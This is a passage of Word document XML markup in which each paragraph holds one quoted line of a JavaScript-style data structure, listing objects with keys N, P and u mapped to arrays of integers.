        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E62B62" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071B24EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37642ECD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196449BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376D9447" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE3F9D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B1904" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13, 16, 20, 29, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B8406" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A44B54B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EBD34B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A159DF1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A58FB26" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A7970D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525ABB0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [2, 4, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC66F5B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 3, 5, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAF882" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C7634" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FA712" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 11, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185932E3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 5, 6, 7, 8, 9, 10, 12, 13, 14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101DDAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA1D398" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3F4C54" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6011C1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [101, 312, 319]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3995C77F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42131752" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717289DD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521FE4C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C97E1E3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C17B29" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9EA87C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2A005" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13, 16, 20, 21, 31, 159, 284, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1CD22" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12179215" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4BE581" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B05057" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E070893" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE0C99D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A3808C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B876602" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24612AFA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA80E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EFEDB8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F707A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [213, 254]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120AE0D9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4660A74B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [11, 6, 2, 16, 5, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FEC683" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D123009" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [67, 90, 109, 131, 139, 159, 173, 252, 311, 317, 339]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC995B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3980B1FE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19393F82" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444616B9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 8, 11, 306]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE28F66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A40DE0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB531B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B408C60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36560B61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF4D2D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66406F04" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EFEB15" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 4, 12, 14, 17, 139, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1A5D6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517EB513" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F586A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [4, 7, 8, 9, 10, 11, 13, 18, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3A711B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 5, 6, 12, 14, 15, 16, 17, 19, 47, 66, 135, 158, 159, 160, 191, 224, 252, 269, 311, 316, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F11EF81" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1DE169" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5D3FCE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63658053" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F8DCB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138869D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609113F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B7F041" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0388BB51" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3, 8, 17]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F86D3C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276C8AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FD0006" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F6869F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4997748E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F408E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C60AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4655A590" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 117]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD618C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225428B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AA4A00" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE595DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [158]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB29A59" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D80D1E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C0800" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444BA225" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 349]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24983D7C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B81EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40347708" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C73337" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70049F7E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C678ECB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE02D9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F201778" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D31523B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382C49D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1618D376" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517504FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 7, 8, 9, 13, 200, 303]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114D8E25" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752DD4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7100FE8E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E328C24" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [119]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043712FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDFC8C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572555F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3, 4, 9, 11, 15, 19, 24, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 54, 55],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6024B2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 5, 6, 7, 8, 10, 12, 13, 14, 16, 17, 18, 20, 21, 22, 23, 25, 53, 131, 159, 197, 265, 297, 311, 317, 351, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596CA870" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3886C07B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249308D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C64DD6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA4D3A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47585707" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230F8B93" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266A4CB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [1, 4, 19, 37, 89, 128, 329]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570CBDF3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDFEE18" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBDC7E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA4001" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64665FD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4676E610" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A64C76E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6743BC12" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92FB12" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB6B709" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
